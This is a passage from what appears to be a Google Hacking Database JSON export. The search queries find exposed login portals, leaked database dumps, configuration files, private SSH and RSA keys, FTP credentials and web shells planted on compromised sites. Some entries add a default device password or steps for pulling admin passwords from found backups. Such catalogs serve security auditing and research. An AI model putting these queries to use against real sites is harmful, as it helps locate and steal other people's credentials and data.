"2013-08-08", "request": "inurl:fluidgalleries/dat/login.dat", "id": 3863}, {"short description": "inurl:5000/webman/index.cgi", "long description": "Synology nas login", "submited": "2013-08-08", "request": "inurl:5000/webman/index.cgi", "id": 3864}, {"short description": "inurl:wp-content/uploads/dump.sql", "long description": "This is *Mohan Pendyala* (penetration tester) from india.Google Dork: *inurl:wp-content/uploads/dump.sql***The *Dump.sql* file reveals total info about the database tables, Users,passwords..etc", "submited": "2013-08-08", "request": "inurl:wp-content/uploads/dump.sql", "id": 3865}, {"short description": "intitle:\"Internet Security Appliance\" &amp; intext:\"Enter Password and click Login\"", "long description": "#Summary: ZyWall Firewall login portal#Category: Various Online Devices#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Internet Security Appliance\" &amp; intext:\"Enter Password and click Login\"", "id": 3866}, {"short description": "inurl:1337w0rm.php intitle:1337w0rm", "long description": "Finds websites that have 1337w0rm's CPanel cracker uploaded.Since the Cracker is relatively new, some sites might not use it.-TehMysticaL", "submited": "2013-08-08", "request": "inurl:1337w0rm.php intitle:1337w0rm", "id": 3867}, {"short description": "intitle:\".:: Welcome to the Web-Based Configurator::.\" &amp; intext:\"Welcome to your router Configuration Interface\"", "long description": "#Summary: ZyXEL router login portal#Category: Pages containing login portals#Author: g00gl3 5c0u7NOTE:currently exists this -&gt; http://www.exploit-db.com/ghdb/270/ but only shows8 results  against 63100 that i sent, also covers more models.", "submited": "2013-08-08", "request": "intitle:\".:: Welcome to the Web-Based Configurator::.\" &amp; intext:\"Welcome to your router Configuration Interface\"", "id": 3868}, {"short description": "intext:\"I'm using a public or shared computer\" &amp; intext:\"Remote Web Workplace\"", "long description": "#Summary: Windows Business Server 2003 Login portal#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intext:\"I&#039;m using a public or shared computer\" &amp; intext:\"Remote Web Workplace\"", "id": 3869}, {"short description": "inurl:\"/secure/login.aspx\"", "long description": "#Summary: Several Web Pages Login Portal#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:\"/secure/login.aspx\"", "id": 3870}, {"short description": "intitle:\"Weather Wing WS-2\"", "long description": "#Summary:Weather Wing (http://www.meteo-system.com/ws2.php) Portal.#Category: Various Online Divices#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Weather Wing WS-2\"", "id": 3871}, {"short description": "intitle:\"NetBotz Network Monitoring Appliance\"", "long description": "#Summary:Various Online Divices#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"NetBotz Network Monitoring Appliance\"", "id": 3872}, {"short description": "intitle:\"Transponder/EOL Configuration:\" inurl:asp", "long description": "#Summary: Cheeta Technologies Transponder Configuration Portal (*http://www.cheetahtech.com).*#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Transponder/EOL Configuration:\" inurl:asp", "id": 3873}, {"short description": "intitle:\"WAMPSERVER Homepage\" &amp; intext:\"Server Configuration\"", "long description": "#Summary: Wampserver Homepage free access (*http://www.wampserver.com/).*#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"WAMPSERVER Homepage\" &amp; intext:\"Server Configuration\"", "id": 3874}, {"short description": "intitle:\"Web Image Monitor\" &amp; inurl:\"/mainFrame.cgi\"", "long description": "#Summary: Several printers that use \"Web Image Monitor\" control panel (http://ricoh.pbworks.com/w/page/14063393/CSWebImageMonitor). Used defaultby Ricoh, Lanier and others.#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Web Image Monitor\" &amp; inurl:\"/mainFrame.cgi\"", "id": 3875}, {"short description": "inurl:8080 intitle:\"Dashboard [Jenkins]\"", "long description": "#Summary: Acces to Jenkins Dashboard#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:8080 intitle:\"Dashboard [Jenkins]\"", "id": 3876}, {"short description": "intitle:\"Login - OTRS\" inurl:pl", "long description": "#Summary: OTRS login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Login - OTRS\" inurl:pl", "id": 3877}, {"short description": "intitle:\"WebMail | Powered by Winmail Server - Login\" &amp; (intext:\"Username\" &amp; intext:\"Password\")", "long description": "#Summary: Winmail login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"WebMail | Powered by Winmail Server - Login\" &amp; (intext:\"Username\" &amp; intext:\"Password\")", "id": 3878}, {"short description": "inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "long description": "#Summary: VoIP login portals#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "id": 3879}, {"short description": "intitle:\"::: Login :::\" &amp; intext:\"Customer Login\" &amp; \"Any time &amp; Any where\"", "long description": "#Summary: Surveillance login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"::: Login :::\" &amp; intext:\"Customer Login\" &amp; \"Any time &amp; Any where\"", "id": 3880}, {"short description": "inurl:phpmyadmin/index.php &amp; (intext:username &amp; password &amp; \"Welcome to\")", "long description": "#Summary: PHP Admin login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:phpmyadmin/index.php &amp; (intext:username &amp; password &amp; \"Welcome to\")", "id": 3881}, {"short description": "inurl:~~joomla3.txt filetype:txt", "long description": "By this dork you can find juicy information joomla configuration filesAuthor: Un0wn_X", "submited": "2013-08-08", "request": "inurl:~~joomla3.txt filetype:txt", "id": 3882}, {"short description": "filetype:txt inurl:wp-config.txt", "long description": "Easily hunt the Wordpress configuration file in of remote web sitesAuthor : Un0wn_X", "submited": "2013-08-08", "request": "filetype:txt inurl:wp-config.txt", "id": 3883}, {"short description": "filetype:txt inurl:~~Wordpress2.txt", "long description": "This dork can be used to find symlinked Wordpress configuration files ofother web sites", "submited": "2013-08-08", "request": "filetype:txt inurl:~~Wordpress2.txt", "id": 3884}, {"short description": "-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "long description": "Dork:-site:simplemachines.org \"These are the paths and URLs to your SMFinstallation\"Details:This google dork finds sites with the Simple Machines repair_settings.phpfile uploaded to the root directory. This gives unauthenticated access tothe SQL username and password for the forum.", "submited": "2013-09-24", "request": "-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "id": 3885}, {"short description": "intitle:\"index of\" myshare", "long description": "Google search for shared HDD directories or shared directories on servers.Gives access to often unconsciously shared documents, programs orsensitive information.Also are often other directories on these drives accessible.Dork by :redN00ws", "submited": "2013-09-24", "request": "intitle:\"index of\" myshare", "id": 3886}, {"short description": "intitle:\"SPA504G Configuration\"", "long description": "Dork : intitle:\"SPA504G Configuration\"Result : Gives access to Cisco SPA504G Configuration Utility for IP phonesScreenshot Google DorkDork found by :redN00ws", "submited": "2013-09-24", "request": "intitle:\"SPA504G Configuration\"", "id": 3887}, {"short description": "\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "long description": "To find private RSA Private SSL Keys", "submited": "2013-09-24", "request": "\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "id": 3888}, {"short description": "inurl:\"/cgi-mod/index.cgi\"", "long description": "Returns login pages for various Barracuda Networks branded hardware spamfilters and mail archivers.4N6 Security", "submited": "2013-09-24", "request": "inurl:\"/cgi-mod/index.cgi\"", "id": 3889}, {"short description": "intitle:\"RouterOS router configuration page\"", "long description": "Returns login portals for Microtik routers running RouterOS version 5and up.4N6 Security", "submited": "2013-09-24", "request": "intitle:\"RouterOS router configuration page\"", "id": 3890}, {"short description": "inurl:\"/webcm?getpage=\"", "long description": "Returns various Actiontec (and often Qwest) branded routers' login pages.4N6 Security", "submited": "2013-09-24", "request": "inurl:\"/webcm?getpage=\"", "id": 3891}, {"short description": "intitle:\"Web Client for EDVS\"", "long description": "Yet another DVR system. Probably requires Java to display.4N6 Security", "submited": "2013-09-24", "request": "intitle:\"Web Client for EDVS\"", "id": 3892}, {"short description": "intitle:index.of intext:.ssh", "long description": "Find peoples ssh public and private keys- tmc / #havok", "submited": "2013-09-24", "request": "intitle:index.of intext:.ssh", "id": 3893}, {"short description": "inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "long description": "With this search you can view results for mikrotik graphics interfaces*Obrigado,*", "submited": "2013-09-24", "request": "inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "id": 3894}, {"short description": "inurl:*/webalizer/* intitle:\"Usage Statistics\"", "long description": "*Obrigado,*", "submited": "2013-09-24", "request": "inurl:*/webalizer/* intitle:\"Usage Statistics\"", "id": 3895}, {"short description": "intitle:\"Comrex ACCESS Rack\"", "long description": "IP Codecs offering \"studio quality audio and video over wired andwireless IP circuits\". Used in studio-grade radio broadcasting over theweb. More product information here: http://www.comrex.com/products.html.This Google search will return (some, but not hundreds of) web-facinglogin portals for this type of device. Requires JavaScript and Flash forviewer to work. Default login: comrex comrex.4N6 Security", "submited": "2013-09-24", "request": "intitle:\"Comrex ACCESS Rack\"", "id": 3896}, {"short description": "site:github.com inurl:sftp-config.json intext:/wp-content/", "long description": "Finds disclosed ftp FTP for Wordpress installs, which have been pushed to a public repo on GitHub.Credit: RogueCoder", "submited": "2013-11-25", "request": "site:github.com inurl:sftp-config.json intext:/wp-content/", "id": 3897}, {"short description": "site:github.com inurl:sftp-config.json", "long description": "Find disclosed FTP login credentials in github repositoriesCredit: RogueCoder", "submited": "2013-11-25", "request": "site:github.com inurl:sftp-config.json", "id": 3898}, {"short description": "inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "long description": "Find FTP logins and full path disclosures pushed to githubinurl:github.com intext:sftp-conf.json +intext:/wp-content/--RogueCoder", "submited": "2013-11-25", "request": "inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "id": 3899}, {"short description": "allinurl:\"owa/auth/logon.aspx\" -google -github", "long description": "[+] Description - Find OWA login portalsRegards,necrodamushttp://www.twitter.com/necrodamus2600", "submited": "2013-11-25", "request": "allinurl:\"owa/auth/logon.aspx\" -google -github", "id": 3900}, {"short description": "ext:sql intext:@gmail.com intext:password", "long description": "author:haji", "submited": "2013-11-25", "request": "ext:sql intext:@gmail.com intext:password", "id": 3901}, {"short description": "inurl:\"struts\" filetype:action", "long description": "Google search for actoin files wich could be explotable via CVE-2013-2251\"Multiple Remote Command Execution Vulnerabilities in Apache Struts\"", "submited": "2013-11-25", "request": "inurl:\"struts\" filetype:action", "id": 3902}, {"short description": "filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "long description": "Project Honey Pot anti-spammer detection (http://www.projecthoneypot.org/)Can identify the honeypot and get the site's honeypot keys---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "id": 3903}, {"short description": "inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "long description": "Git config fileEasy way to find Git Repositories---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "id": 3904}, {"short description": "intitle:\"IPCam Client\"", "long description": "Foscam IPCamBy default these cameras attach to the myfoscam.org DDNS. So you could addsite:myfoscam.org. On the otherhand if you're hunting for DDNS servers, youcould negate that site and examine the other results.---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "intitle:\"IPCam Client\"", "id": 3905}, {"short description": "inurl:/wp-content/uploads/ filetype:sql", "long description": "Google dork for WordPress database backup file (sql):inurl:/wp-content/uploads/ filetype:sqlBy sm0k3 (http://sm0k3.net - Sm0k3 HQ)_________________With regards,sm0k3Any questions: info@sm0k3.netAdministration issues: admin@sm0k3.netWant to submit an order: submit@sm0k3.netJabber: sm0k3@im.sm0k3.netBlog: http://sm0k3.net", "submited": "2013-11-25", "request": "inurl:/wp-content/uploads/ filetype:sql", "id": 3906}, {"short description": "site:github.com inurl:\"known_hosts\" \"ssh-rsa\"", "long description": "Finds SSH known_hosts files on GitHub.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "site:github.com inurl:\"known_hosts\" \"ssh-rsa\"", "id": 3907}, {"short description": "site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "long description": "Finds private SSH keys on GitHub.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "id": 3908}, {"short description": "inurl:\"/module.php/core/loginuserpass.php\"", "long description": "Finds SimpleSAMLphp login pages.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "inurl:\"/module.php/core/loginuserpass.php\"", "id": 3909}, {"short description": "inurl:\"/jenkins/login\" \"Page generated\"", "long description": "Finds login pages for Jenkins continuous integration servers.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "inurl:\"/jenkins/login\" \"Page generated\"", "id": 3910}, {"short description": "\"inurl:/data/nanoadmin.php\"", "long description": "Hi,I would like to submit this GHDB which allow to find out nanoCMSadministration pages :*inurl:\"/data/nanoadmin.php\"*Best regards,Antonino Napoli", "submited": "2013-11-25", "request": "\"inurl:/data/nanoadmin.php\"", "id": 3911}, {"short description": "intitle:\"uploader by ghost-dz\" ext:php", "long description": "intitle:\"uploader by ghost-dz\" ext:php", "submited": "2013-11-25", "request": "intitle:\"uploader by ghost-dz\" ext:php", "id": 3912}, {"short description": "filetype:bak (inurl:php | inurl:asp | inurl:rb)", "long description": "This one could be used to find all sorts of backup data, but this exampleis limited to just common webapp extensions---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:bak (inurl:php | inurl:asp | inurl:rb)", "id": 3913}, {"short description": "intitle:\"index of\" intext:\".ds_store\"", "long description": "Mac OSX directories---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "intitle:\"index of\" intext:\".ds_store\"", "id": 3914}, {"short description": "inurl:tar filetype:gz", "long description": "Tar filesContain user and group information (in addition to potentially useful files)---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "inurl:tar filetype:gz", "id": 3915}, {"short description": "intitle:\"RT at a glance\" intext:\"quick search\"", "long description": "RT Request Tracker Ticket Databasehttp://www.bestpractical.com/rt/---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "intitle:\"RT at a glance\" intext:\"quick search\"", "id": 3916}, {"short description": "inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "long description": "JBosshttp://docs.jboss.org/jbossas/docs/Server_Configuration_Guide/4/html/Connecting_to_the_JMX_Server-Inspecting_the_Server___the_JMX_Console_Web_Application.html---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "id": 3917}, {"short description": "filetype:php intext:\"!C99Shell v. 1.0 beta\"", "long description": "php backdoor: c99 shell---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:php intext:\"!C99Shell v. 1.0 beta\"", "id": 3918}, {"short description": "filetype:xml inurl:sitemap", "long description": "Sitemaps, the opposite of Web Robots ExclusionDetail directory and page map---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:xml inurl:sitemap", "id": 3919}, {"short description": "filetype:jnlp", "long description": "Java Web Start (Java Network Launch Protocol)---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:jnlp", "id": 3920}, {"short description": "filetype:password jmxremote", "long description": "Passwords for Java Management Extensions (JMX Remote)Used by jconsole, Eclipse's MAT, Java Visual VM, JmxClihttp://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:password jmxremote", "id": 3921}, {"short description": "inurl:mikrotik filetype:backup", "long description": "mikrotik url backups uploaded..then.. credentials cracked via http://mikrotikpasswordrecovery.comBest Regards,kn0wl13dg3 - underc0de team.-    www.underc0de.orgkn0w13dg3.blogspot.com", "submited": "2013-11-27", "request": "inurl:mikrotik filetype:backup", "id": 3922}, {"short description": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "long description": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -githubHow This Work?This dork will searches databases phpMyAdmin. Searches only sql formats and founds admin username and passwords to use this information to login as administratorSorry for my english. I'm not a native speaker", "submited": "2013-11-27", "request": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "id": 3923}, {"short description": "inurl:/administrator/index.php?autologin=1", "long description": "Title: google hacking username and password of joomlaGoogle Dork: inurl:/administrator/index.php?autologin=1Date: 2013-11-30Author: Ashiyane Digital Security TeamSoftware Link: www.joomla.org/Version: joomla 2.5Location: /administrator/index.php?autologin=1&amp;passwd=[password]&amp;username=[username]", "submited": "2013-12-03", "request": "inurl:/administrator/index.php?autologin=1", "id": 3924}, {"short description": "allinurl:\"/main/auth/profile.php\" -github -google", "long description": "[+] This dork will help you find Chamilo login portals.  Depending on theversion, the site could be vulnerable to SQL injection.See Here-http://www.exploit-db.com/exploits/30012/Regards,necrodamushttp://www.twitter.com/necrodamus2600", "submited": "2014-01-03", "request": "allinurl:\"/main/auth/profile.php\" -github -google", "id": 3925}, {"short description": "intitle:\"=[ 1n73ct10n privat shell ]=\"", "long description": "the dork is used to find uploaded 1n73ct10n Shell on website.found by Anon?M ID", "submited": "2014-01-03", "request": "intitle:\"=[ 1n73ct10n privat shell ]=\"", "id": 3926}, {"short description": "intitle:\"WSO 2.4\" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "long description": "dork to find uploaded WSO 2.4 shell by hackers.found by Anon?M ID", "submited": "2014-01-03", "request": "intitle:\"WSO 2.4\" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "id": 3927}, {"short description": "intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "long description": "Find IDS and Mod securitydork: intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "submited": "2014-02-05", "request": "intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "id": 3928}, {"short description": "allinurl:\"zimbra/?zinitmode=http\" -google -github", "long description": "zimbra webmail login page lookupallinurl:\"zimbra/?zinitmode=http\" -google -github-------------------------------------------------------------------*|JJohnny *RANDRIAMAMPIONONA              ||     Phone: (+261) 33 08 003 61                    ||      NSS Engineer | IS Security Enthusiast   ||  |----------------------------------------------------------------|", "submited": "2014-02-05", "request": "allinurl:\"zimbra/?zinitmode=http\" -google -github", "id": 3929}, {"short description": "intext:\"Access denied for\" intitle:\"Shopping cart\"", "long description": "Here is a Dork I use in conjunction with sqlmap, for shopping carts withMySQLError messages.It got 80.000 results.intext:\"Access denied for\" intitle:\"Shopping cart\"", "submited": "2014-02-05", "request": "intext:\"Access denied for\" intitle:\"Shopping cart\"", "id": 3930}, {"short description": "allinurl:/hide_my_wp=", "long description": "i just found a google dork that isfile/path disclosure ofHide My WP pluginGoogle dork - allinurl:/hide_my_wp=it will show the plugin file folder and all file.thankskamrul hassan arman", "submited": "2014-02-05", "request": "allinurl:/hide_my_wp=", "id": 3931}, {"short description": "inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "long description": "Search Oracle Reports likely vulnerable to DB user/password disclosure(CVE-2012-3152and CVE-2012-3153)--Felipe Molina", "submited": "2014-02-05", "request": "inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "id": 3932}, {"short description": "intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "long description": "The web application is vulnerable to Directory Traversal and XSS.The version number can be omitted, all prior versions prior than 2.1.4are vulnerable.Advisories and Vulnerabilitieshttp://www.exploit-db.com/exploits/31173/http://www.pchart.net/advisory", "submited": "2014-02-05", "request": "intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "id": 3933}, {"short description": "\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "long description": "Just another error that reveals full paths", "submited": "2014-02-05", "request": "\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "id": 3934}, {"short description": "site:bitbucket.org inurl:.bash_history", "long description": "Finding Sensitive datasite:bitbucket.org inurl:.bash_historyBy Pharos", "submited": "2014-02-05", "request": "site:bitbucket.org inurl:.bash_history", "id": 3935}, {"short description": "intitle:Admin inurl:login.php site:.co.in", "long description": "dork submitted by M4RKM3N aka Osama Mahmoodrevels admin login panels of sites :)", "submited": "2014-02-28", "request": "intitle:Admin inurl:login.php site:.co.in", "id": 3936}, {"short description": "inurl:crossdomain filetype:xml intext:allow-access-from", "long description": "Locates crossdomain.xml files used by flash/flex/silverlight todetermine the cross domain policy of that site'sflash/flex/silverlight apps. An open setting of  will allow a weaponized flash application hosted on anattacker's site to read information from the target site while runningin a victim's browser.--Google+ http://google.com/+EricGragsoneRed Team http://www.crimsonagents.com/Blue Team http://www.erisresearch.org/Coding http://maetrics.github.io", "submited": "2014-03-27", "request": "inurl:crossdomain filetype:xml intext:allow-access-from", "id": 3937}, {"short description": "inurl:clientaccesspolicy filetype:xml intext:allow-from", "long description": "Locates clientaccesspolicy.xml files used by silverlight to determinethe cross domain policy of that site's silverlight apps. An opensetting of  will allow a weaponized silverlightapplication hosted on an attacker's site to read information from thetarget site while running in a victim's browser.--Google+ http://google.com/+EricGragsoneRed Team http://www.crimsonagents.com/Blue Team http://www.erisresearch.org/Coding http://maetrics.github.io", "submited": "2014-03-27", "request": "inurl:clientaccesspolicy filetype:xml intext:allow-from", "id": 3938}, {"short description": "inurl:/backup intitle:index of backup intext:*sql", "long description": "Google Search:https://www.google.com/search?client=opera&amp;q=admin+username+and+pass&amp;sourceid=opera&amp;ie=UTF-8&amp;oe=UTF-8#q=inurl:/backup+intitle:index+of+backup+intext:*sql&amp;start=701)Find the Back Up2)Downlod it3)Import it into phpmyadmin4)Find the admin username and password :)Dork submitted by The Vi9erGood Luck", "submited": "2014-03-31", "request": "inurl:/backup intitle:index of backup intext:*sql", "id": 3939}, {"short description": "inurl:\"Citrix/XenApp/auth/login.aspx\"", "long description": "Finds login portals for Citrix XenApp.- Andy G - twitter.com/vxhex", "submited": "2014-03-31", "request": "inurl:\"Citrix/XenApp/auth/login.aspx\"", "id": 3940}, {"short description": "filetype:pdf \"acunetix website audit\" \"alerts summary\"", "long description": "Finds reports generated by Acunetix scans.- Andy G - twitter.com/vxhex", "submited": "2014-03-31", "request": "filetype:pdf \"acunetix website audit\" \"alerts summary\"", "id": 3941}, {"short description": "inurl:typo3/install/index.php?mode=", "long description": "typo3 install loginsBruno Schmid", "submited": "2014-04-07", "request": "inurl:typo3/install/index.php?mode=", "id": 3942}, {"short description": "inurl:typo3conf/localconf.php", "long description": "typo3 passwords :-)Bruno Schmid", "submited": "2014-04-07", "request": "inurl:typo3conf/localconf.php", "id": 3943}, {"short description": "intitle:\"Zimbra Web Client Sign In\"", "long description": "Open Source Zimbra Webmail Login pages", "submited": "2014-04-21", "request": "intitle:\"Zimbra Web Client Sign In\"", "id": 3944}, {"short description": "intitle:\"Zimbra Web Client Log In\"", "long description": "Open Source Zimbra Webmail Login pages", "submited": "2014-04-21", "request": "intitle:\"Zimbra Web Client Log In\"", "id": 3945}, {"short description": "xamppdirpasswd.txt filetype:txt", "long description": "xamppdirpasswd.txt filetype:txt", "submited": "2014-04-28", "request": "xamppdirpasswd.txt filetype:txt", "id": 3946}, {"short description": "inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "long description": "Search the CACTI system of SNMP graphsDaniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2014-04-30", "request": "inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "id": 3947}, {"short description": "\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "long description": "Search for all Apache servers that are running specific versions ofOpenSSL. These specific versions of OpenSSL could potentially be vulnerableto the heartbleed attack.Ahmad Al-Nounouhttp://www.linkedin.com/in/ahmadalnounou", "submited": "2014-05-05", "request": "\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "id": 3948}, {"short description": "inurl:\"/public.php?service=files\"", "long description": "Search for shared files from ownCloudDaniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2014-05-06", "request": "inurl:\"/public.php?service=files\"", "id": 3949}, {"short description": "intext:\"Hikvision\" inurl:\"login.asp\"", "long description": "Hikvision IP Camera login page", "submited": "2014-05-08", "request": "intext:\"Hikvision\" inurl:\"login.asp\"", "id": 3950}, {"short description": "inurl:dfshealth.jsp", "long description": "dork:inurl:dfshealth.jspdirect get the access of hadoop cluster with root user--Simmant Yadav", "submited": "2014-05-19", "request": "inurl:dfshealth.jsp", "id": 3951}, {"short description": "(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "long description": "Files with information DMZ, public IP, private IP network segments, etc.Daniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2014-06-03", "request": "(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "id": 3952}, {"short description": "inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", "long description": "Search the Munin monitoring graphsDaniel Maldonadohttp://caceriadespammers.blogspot.com.ar", "submited": "2014-06-12", "request": "inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", "id": 3953}, {"short description": "SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "long description": "inurl:/SiteScope/cgi/go.exe/SiteScope?page=twitter@firebitsbr", "submited": "2014-07-03", "request": "dorks:SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "id": 3954}, {"short description": "filetype:sql site:gov and \"insert into\"", "long description": "filetype:sql  site:gov and \"insert into\"find sql files with data on governments sites", "submited": "2014-07-04", "request": "filetype:sql site:gov and \"insert into\"", "id": 3955}, {"short description": "inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "long description": "Hits: 4,250 resultsThis dork finds PacketCable 1.0 Touchstone Telephony Modems that are onlinewherein you see its event logs, system information, interface parameters,mac addresses, etc.*Jay Turla a.k.a shipcode*", "submited": "2014-07-21", "request": "inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "id": 3956}, {"short description": "http://www.google.com/search?q=filetype:sql site:com and \"insert into\" admin \"2014\"", "long description": "filetype:sql site:com and \"insert into\" admin \"2014\"http://facebook.com/groups/hfrosario", "submited": "2014-07-29", "request": "filetype:sql site:com and \"insert into\" admin \"2014\"", "id": 3957}, {"short description": "intitle:\"index\" intext:\"Login to the Administrative Interface\"", "long description": "via Priyal Viroja", "submited": "2014-08-09", "request": "intitle:\"index\" intext:\"Login to the Administrative Interface\"", "id": 3958}, {"short description": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "long description": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:iniFiles containing passwordsBy Dr4GoR1Ty", "submited": "2014-08-21", "request": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "id": 3959}, {"short description": "\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "long description": "ATM Passwords\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "submited": "2014-09-15", "request": "\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "id": 3960}, {"short description": "\"google confidential\" filetype:pdf", "long description": "\"google confidential\" filetype:pdfGoogle leaking their own files", "submited": "2014-09-15", "request": "\"google confidential\" filetype:pdf", "id": 3961}, {"short description": "intitle:\"virtual office\" sonicwall domain", "long description": "Network or vulnerability dataIP address AD Domain NameLogin entry/method for internal network", "submited": "2014-10-02", "request": "intitle:\"virtual office\" sonicwall domain", "id": 3962}, {"short description": "dcid= bn= pin code=", "long description": "Information disclosure of reservation information,which can leak to many other leaks.All related to t Booking.com client who decided to save theirs trip data online,sometime near personal information like passportBy popshark1", "submited": "2014-10-02", "request": "dcid= bn= pin code=", "id": 3963}, {"short description": "ext:cgi inurl:cgi-bin intext:#!/bin/bash", "long description": "gnu-bash site dorksAriel Anonis - @ariel_anonis", "submited": 